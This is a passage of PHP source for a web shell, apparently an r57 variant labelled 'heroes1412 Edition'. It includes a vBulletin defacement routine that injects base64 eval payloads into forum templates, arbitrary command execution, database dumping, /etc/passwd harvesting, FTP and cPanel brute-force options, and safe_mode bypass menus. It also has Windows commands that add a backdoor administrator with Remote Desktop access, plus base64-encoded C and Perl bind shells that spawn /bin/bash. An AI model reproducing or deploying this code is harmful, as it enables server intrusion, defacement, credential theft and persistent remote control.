";
$h4cker="[Edited] by heroes1412";
if (!empty($_POST['dbh']) && !empty($_POST['dbn']) && !empty($_POST['dbu']) && !empty($_POST['index']))
{
$dbh = $_POST['dbh'];
$dbn = $_POST['dbn'];
$dbu = $_POST['dbu'];
$dbp = $_POST['dbp'];
$index=str_replace("\'","'",$index);
$set_index = "{\${eval(base64_decode(\'".base64_encode($index);
//$set_index .= base64_encode("eval ('$index');");
$set_index .= "\'))}}{\${exit()}}";
mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
mysql_select_db($dbn) or die(mysql_error());
$fatal1 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='spacer_open'";
$fatal2 = "UPDATE template SET template='".$set_index."".$h4cker."' WHERE title='FORUMHOME'";
$fatal3 = "UPDATE style SET css='".$set_index."".$h4cker."', stylevars='', csscolors='', editorstyles=''";
$result = mysql_query($fatal1) or die (mysql_error());
$result2 = mysql_query($fatal2) or die (mysql_error());
$result3 = mysql_query($fatal3) or die (mysql_error());
if ($result && $result2 && $result3) {
echo "Okie";
}
}
echo "
"; die();}
$language='eng';
$auth = 0;
error_reporting(E_ALL);
$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
$downloaders = array('wget','fetch','lynx','links','curl','get');
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
define("starttime",getmicrotime());
$safe_mode = @ini_get('safe_mode');
$version = 'heroes1412 Edition';
$footer = '
';
if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
if(@function_exists('ini_set'))
{
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
}
else
{
@ini_alter('max_execution_time',0);
@ini_alter('output_buffering',0);
}
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}
function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
$mime_type = 'application/octet-stream';
}
}
class my_sql
{
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;
function connect()
{
switch($this->db)
{
case 'MySQL':
if(empty($this->port)) { $this->port = '3306'; }
if(!function_exists('mysql_connect')) return 0;
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'MSSQL':
if(empty($this->port)) { $this->port = '1433'; }
if(!function_exists('mssql_connect')) return 0;
$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
if($this->connection) return 1;
break;
case 'PostgreSQL':
if(empty($this->port)) { $this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
if(!function_exists('pg_connect')) return 0;
$this->connection = @pg_connect($str);
if(is_resource($this->connection)) return 1;
break;
case 'Oracle':
if(!function_exists('ocilogon')) return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if(is_resource($this->connection)) return 1;
break;
}
return 0;
}
function select_db()
{
switch($this->db)
{
case 'MySQL':
if(@mysql_select_db($this->base,$this->connection)) return 1;
break;
case 'MSSQL':
if(@mssql_select_db($this->base,$this->connection)) return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
}
return 0;
}
function query($query)
{
$this->res=$this->error='';
switch($this->db)
{
case 'MySQL':
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
{
$this->error = @mysql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'MSSQL':
if(false===($this->res=@mssql_query($query,$this->connection)))
{
$this->error = 'Query error';
return 0;
}
else if(@mssql_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'PostgreSQL':
if(false===($this->res=@pg_query($this->connection,$query)))
{
$this->error = @pg_last_error($this->connection);
return 0;
}
else if(@pg_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'Oracle':
if(false===($this->res=@ociparse($this->connection,$query)))
{
$this->error = 'Query parse error';
}
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2;
return 1;
}
$error = @ocierror();
$this->error=$error['message'];
}
break;
}
return 0;
}
function get_result()
{
$this->rows=array();
$this->columns=array();
$this->num_rows=$this->num_fields=0;
switch($this->db)
{
case 'MySQL':
$this->num_rows=@mysql_num_rows($this->res);
$this->num_fields=@mysql_num_fields($this->res);
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MSSQL':
$this->num_rows=@mssql_num_rows($this->res);
$this->num_fields=@mssql_num_fields($this->res);
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
break;
case 'PostgreSQL':
$this->num_rows=@pg_num_rows($this->res);
$this->num_fields=@pg_num_fields($this->res);
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'Oracle':
$this->num_fields=@ocinumcols($this->res);
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
@ocifreestatement($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
}
return 0;
}
function dump($table)
{
if(empty($table)) return 0;
$this->dump=array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
$this->dump[3] = '## Database: '.$this->base;
$this->dump[4] = '## Table: '.$table;
$this->dump[5] = '## --------------------------------------- ';
switch($this->db)
{
case 'MySQL':
$this->dump[0] = '## MySQL dump';
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
$this->dump[] = $this->rows[0]['Create Table'];
$this->dump[] = '## --------------------------------------- ';
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MSSQL':
$this->dump[0] = '## MSSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'PostgreSQL':
$this->dump[0] = '## PostgreSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'Oracle':
$this->dump[0] = '## ORACLE dump';
$this->dump[] = '## under construction';
break;
default:
return 0;
break;
}
return 1;
}
function close()
{
switch($this->db)
{
case 'MySQL':
@mysql_close($this->connection);
break;
case 'MSSQL':
@mssql_close($this->connection);
break;
case 'PostgreSQL':
@pg_close($this->connection);
break;
case 'Oracle':
@oci_close($this->connection);
break;
}
}
function affected_rows()
{
switch($this->db)
{
case 'MySQL':
return @mysql_affected_rows($this->res);
break;
case 'MSSQL':
return @mssql_affected_rows($this->res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this->res);
break;
case 'Oracle':
return @ocirowcount($this->res);
break;
default:
return 0;
break;
}
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
{
if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
else
{
@ob_clean();
$filename = @basename($_POST['d_name']);
$filedump = @fread($file,@filesize($_POST['d_name']));
fclose($file);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "
"; die(); }
if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
{
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
echo '';
if(!$sql->connect()) echo "
";
else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "
";
break;
case '1':
if($sql->get_result())
{
echo "
";
}
break;
case '2':
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
echo "
"; die();
}
if(isset($_GET['delete']))
{
@unlink(__FILE__);
}
if(isset($_GET['tmp']))
{
@unlink("/tmp/bdpl");
@unlink("/tmp/back");
@unlink("/tmp/bd");
@unlink("/tmp/bd.c");
@unlink("/tmp/dp");
@unlink("/tmp/dpc");
@unlink("/tmp/dpc.c");
}
if(isset($_GET['phpini']))
{
echo $head;
function U_value($value)
{
if ($value == '') return '
';
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
if ($value === null) return 'NULL';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return U_wordwrap((string) $value);
}
function U_wordwrap($str)
{
$str = @wordwrap(@htmlspecialchars($str), 100, '
";
die();
}
$lang=array(
/* --------------------------------------------------------------- */
'eng_text1' =>'Executed command',
'eng_text2' =>'Execute command on server',
'eng_text3' =>'Run command',
'eng_text4' =>'Work directory',
'eng_text5' =>'Upload files on server',
'eng_text6' =>'Local file',
'eng_text7' =>'Aliases',
'eng_text8' =>'Select alias',
'eng_butt1' =>'Execute',
'eng_butt2' =>'Upload',
'eng_text9' =>'Bind port to /bin/bash',
'eng_text10'=>'Port',
'eng_text11'=>'Password for access',
'eng_butt3' =>'Bind',
'eng_text12'=>'back-connect',
'eng_text13'=>'IP',
'eng_text14'=>'Port',
'eng_butt4' =>'Connect',
'eng_text15'=>'Upload files from remote server',
'eng_text16'=>'With',
'eng_text17'=>'Remote file',
'eng_text18'=>'Local file',
'eng_text20'=>'Use',
'eng_text21'=>' New name',
'eng_text23'=>'Local port',
'eng_text24'=>'Remote host',
'eng_text25'=>'Remote port',
'eng_text26'=>'Use',
'eng_butt5' =>'Run',
'eng_text28'=>'Work in safe_mode',
'eng_text29'=>'...::: ACCESS DENIED :::...',
'eng_butt6' =>'Change',
'eng_text30'=>'Cat file',
'eng_butt7' =>'Show',
'eng_text31'=>'File not found',
'eng_text32'=>'Eval PHP code',
'eng_text33'=>'Test bypass open_basedir with cURL functions',
'eng_butt8' =>'Test',
'eng_text34'=>'',
'eng_text35'=>'Test bypass with load file in mysql',
'eng_text36'=>'Db . Table',
'eng_text37'=>'Login',
'eng_text38'=>'Password',
'eng_text39'=>'Database',
'eng_text40'=>'Dump database table',
'eng_butt9' =>'Dump',
'eng_text41'=>'Save dump in file',
'eng_text42'=>'Edit files',
'eng_text43'=>'File for edit',
'eng_butt10'=>'Save',
'eng_text44'=>'Can\'t edit file! Only read access!',
'eng_text45'=>'File saved',
'eng_text46'=>'Show phpinfo()',
'eng_text47'=>'Show variables from php.ini',
'eng_text48'=>'Delete temp files',
'eng_butt11'=>'Edit file',
'eng_text49'=>'Delete script from server',
'eng_text50'=>'View cpu info',
'eng_text51'=>'View memory info',
'eng_text52'=>'Find text',
'eng_text53'=>'In dirs',
'eng_text54'=>'Find text in files',
'eng_butt12'=>'Find',
'eng_text55'=>'Only in files',
'eng_text56'=>'Nothing :(',
'eng_text57'=>'Create/Delete File/Dir',
'eng_text58'=>'name',
'eng_text59'=>'file',
'eng_text60'=>'dir',
'eng_butt13'=>'Create/Delete',
'eng_text61'=>'File created',
'eng_text62'=>'Dir created',
'eng_text63'=>'File deleted',
'eng_text64'=>'Dir deleted',
'eng_text65'=>'Create',
'eng_text66'=>'Delete',
'eng_text67'=>'Chown/Chgrp/Chmod',
'eng_text68'=>'Command',
'eng_text69'=>'param1',
'eng_text70'=>'param2',
'eng_text71'=>"Second commands param is:
- for CHOWN - name of new owner or UID
- for CHGRP - group name or GID
- for CHMOD - 0777, 0755...",
'eng_text72'=>'Text for find',
'eng_text73'=>'Find in folder',
'eng_text74'=>'Find in files',
'eng_text75'=>'* you can use regexp',
'eng_text76'=>'',
'eng_text80'=>'Type',
'eng_text81'=>'Net',
'eng_text82'=>'Databases',
'eng_text83'=>'Run SQL query',
'eng_text84'=>'SQL query',
'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
'eng_text86'=>'Download files from server',
'eng_butt14'=>'Download',
'eng_text87'=>'Download files from remote ftp-server',
'eng_text88'=>'FTP-server:port',
'eng_text89'=>'File on ftp',
'eng_text90'=>'Transfer mode',
'eng_text91'=>'Archivation',
'eng_text92'=>'without archivation',
'eng_text93'=>'FTP',
'eng_text94'=>'FTP-bruteforce',
'eng_text95'=>'Users list',
'eng_text96'=>'Can\'t get users list',
'eng_text97'=>'checked: ',
'eng_text98'=>'success: ',
'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
'eng_text100'=>'Send file to remote ftp server',
'eng_text101'=>'Use reverse (user -> resu) login for password',
'eng_text109'=>'Hide',
'eng_text110'=>'Show',
'eng_text111'=>'SQL-Server : Port',
'eng_text115'=>'',
'eng_text116'=>'Copy from',
'eng_text117'=>'to',
'eng_text118'=>'File copied',
'eng_text119'=>'Cant copy file',
'eng_text120'=>'SQL-Server',
'eng_text121'=>'Vbulletin Deface',
'eng_text122'=>'ln -s',
'eng_text123'=>'Brute Cpanel Account',
'eng_text124'=>'About me',
'eng_text125'=>'Bypass php 5.2.6',
'eng_text127'=>'Bypass php 5.2.9',
'eng_text128'=>'Destroy file....',
'eng_text129'=>'Useful',
'eng_text130'=>'Downloaders',
'eng_text131'=>'Php Bypass',
'eng_err0'=>'Error! Can\'t write in file ',
'eng_err1'=>'Error! Can\'t read file ',
'eng_err2'=>'Error! Can\'t create ',
'eng_err5'=>'Error! Can\'t change dir on ftp',
'eng_text200'=>'read file from vul copy()',
'eng_text202'=>'where file in server',
'eng_text300'=>'read file from vul curl()',
'eng_text203'=>'read file from vul ini_restore()',
'eng_text204'=>'Show list users',
'eng_text205'=>'write shell in this side',
'eng_text206'=>'read dir',
'eng_text207'=>'read dir from vul reg_glob',
'eng_text209'=>'read dir from vul root',
'eng_text210'=>'DeZender ',
'eng_text211'=>'safe_mode off',
'eng_text212'=>'Close safe_mode with php.ini',
'eng_text213'=>'Close security_mod with .htaccess',
'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
'eng_text219'=>'Get file to server in safe_mode and change name',
'eng_text224'=>'read file from PLUGIN',
'eng_text226' => 'Write to file',
'eng_text230' => 'ionCube extension safe_mode bypass',
'eng_text231' => 'win32std extension safe_mode bypass',
'eng_text232' => 'win32service extension safe_mode bypass',
'eng_text233' => 'perl extension safe_mode bypass',
'eng_text234' => 'FFI extension safe_mode bypass',
'eng_butt65'=>'Write',
);
$aliases=array(
'________________for server unix ______________-'=>'dir -ao',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find / -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'show opened ports'=>'netstat -an | grep -i listen',
'________________for server windows ______________-'=>'dir',
'1_add new user'=>'net user heroes1412 123456 /add',
'2_add your user for admin group'=>'net localgroup administrators heroes1412 /add',
'3_add your user for Remote Desktop group'=>'net localgroup "Remote Desktop Users" heroes1412 /add',
'----------------------------------------------------------------------------------------------------'=>'ls -la'
);
$table_up1 = "
";
$table_up3 = "| ";
$table_end1 = " | ";
$arrow = " 4";
$lb = "[";
$rb = "]";
$font = "";
$ts = "";
$fs = "";
if(isset($_GET['users']))
{
echo $head;
if(!$users=get_users()) { echo "".$lang[$language.'_text96'].""; }
else
{
echo '';
}
echo ""; die();
}
if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
$unix = 0;
if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
if(empty($dir))
{
$os = getenv('OS');
if(empty($os)){ $os = php_uname(); }
if(empty($os)){ $os ="-"; $unix=1; }
else
{
if(@eregi("^win",$os)) { $unix = 0; }
else { $unix = 1; }
}
}
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
{
echo $head;
if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
$sr->SearchText(0,0);
$res = $sr->GetResultFiles();
$found = $sr->GetMatchesCount();
$titles = $sr->GetTitles();
$r = "";
if($found > 0)
{
$r .= "";
foreach($res as $file=>$v)
{
$r .= "";
$r .= "| ".ws(3);
$r .= (!$unix)? str_replace("/","\",$file) : $file;
$r .= "";
$r .= " | ";
foreach($v as $a=>$b)
{
$r .= "";
$r .= "| ".$a." | ";
$r .= "".ws(2).$b." | ";
$r .= "
";
}
}
$r .= " ";
echo $r;
}
else
{
echo "".$lang[$language.'_text56']." ";
}
echo "
";
die();
}
if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
function ws($i)
{
return @str_repeat(" ",$i);
}
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("
",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
function get_users()
{
$users = array();
if (file_exists('passwd.txt')) {
$rows=file('passwd.txt');
} else {
$rows=file('/etc/passwd');
}
if(!$rows) return 0;
foreach ($rows as $string)
{
$user = @explode(":",$string);
if(substr($string,0,1)!='#') array_push($users,$user[0]);
}
return $users;
}
function err($n,$txt='')
{
echo '';
echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
if(!empty($txt)) { echo " $txt"; }
echo ' |
';
return null;
}
function perms($mode)
{
if (!$GLOBALS['unix']) return 0;
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
function in($type,$name,$size,$value,$checked=0)
{
$ret = "";
}
function which($pr)
{
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return $pr; }
}
function cf($fname,$text)
{
$w_file=@fopen($fname,"w") or err(0);
if($w_file)
{
@fputs($w_file,base64_decode($text));
@fclose($w_file);
}
}
function sr($l,$t1,$t2)
{
return "| ".$t1." | ".$t2." | ";
}
if (!@function_exists("view_size"))
{
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
}
function DirFilesR($dir,$types='')
{
$files = Array();
if(($handle = @opendir($dir)))
{
while (false !== ($file = @readdir($handle)))
{
if ($file != "." && $file != "..")
{
if(@is_dir($dir."/".$file))
$files = @array_merge($files,DirFilesR($dir."/".$file,$types));
else
{
$pos = @strrpos($file,".");
$ext = @substr($file,$pos,@strlen($file)-$pos);
if($types)
{
if(@in_array($ext,explode(';',$types)))
$files[] = $dir."/".$file;
}
else
$files[] = $dir."/".$file;
}
}
}
@closedir($handle);
}
return $files;
}
class SearchResult
{
var $text;
var $FilesToSearch;
var $ResultFiles;
var $FilesTotal;
var $MatchesCount;
var $FileMatschesCount;
var $TimeStart;
var $TimeTotal;
var $titles;
function SearchResult($dir,$text,$filter='')
{
$dirs = @explode(";",$dir);
$this->FilesToSearch = Array();
for($a=0;$aFilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
$this->text = $text;
$this->FilesTotal = @count($this->FilesToSearch);
$this->TimeStart = getmicrotime();
$this->MatchesCount = 0;
$this->ResultFiles = Array();
$this->FileMatchesCount = Array();
$this->titles = Array();
}
function GetFilesTotal() { return $this->FilesTotal; }
function GetTitles() { return $this->titles; }
function GetTimeTotal() { return $this->TimeTotal; }
function GetMatchesCount() { return $this->MatchesCount; }
function GetFileMatchesCount() { return $this->FileMatchesCount; }
function GetResultFiles() { return $this->ResultFiles; }
function SearchText($phrase=0,$case=0) {
$qq = @explode(' ',$this->text);
$delim = '|';
if($phrase)
foreach($qq as $k=>$v)
$qq[$k] = '�'.$v.'�';
$words = '('.@implode($delim,$qq).')';
$pattern = "/".$words."/";
if(!$case)
$pattern .= 'i';
foreach($this->FilesToSearch as $k=>$filename)
{
$this->FileMatchesCount[$filename] = 0;
$FileStrings = @file($filename) or @next;
for($a=0;$a<@count($FileStrings);$a++)
{
$count = 0;
$CurString = $FileStrings[$a];
$CurString = @Trim($CurString);
$CurString = @strip_tags($CurString);
$aa = '';
if(($count = @preg_match_all($pattern,$CurString,$aa)))
{
$CurString = @preg_replace($pattern,"�",$CurString);
$this->ResultFiles[$filename][$a+1] = $CurString;
$this->MatchesCount += $count;
$this->FileMatchesCount[$filename] += $count;
}
}
}
$this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
}
}
function getmicrotime()
{
list($usec,$sec) = @explode(" ",@microtime());
return ((float)$usec + (float)$sec);
}
$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
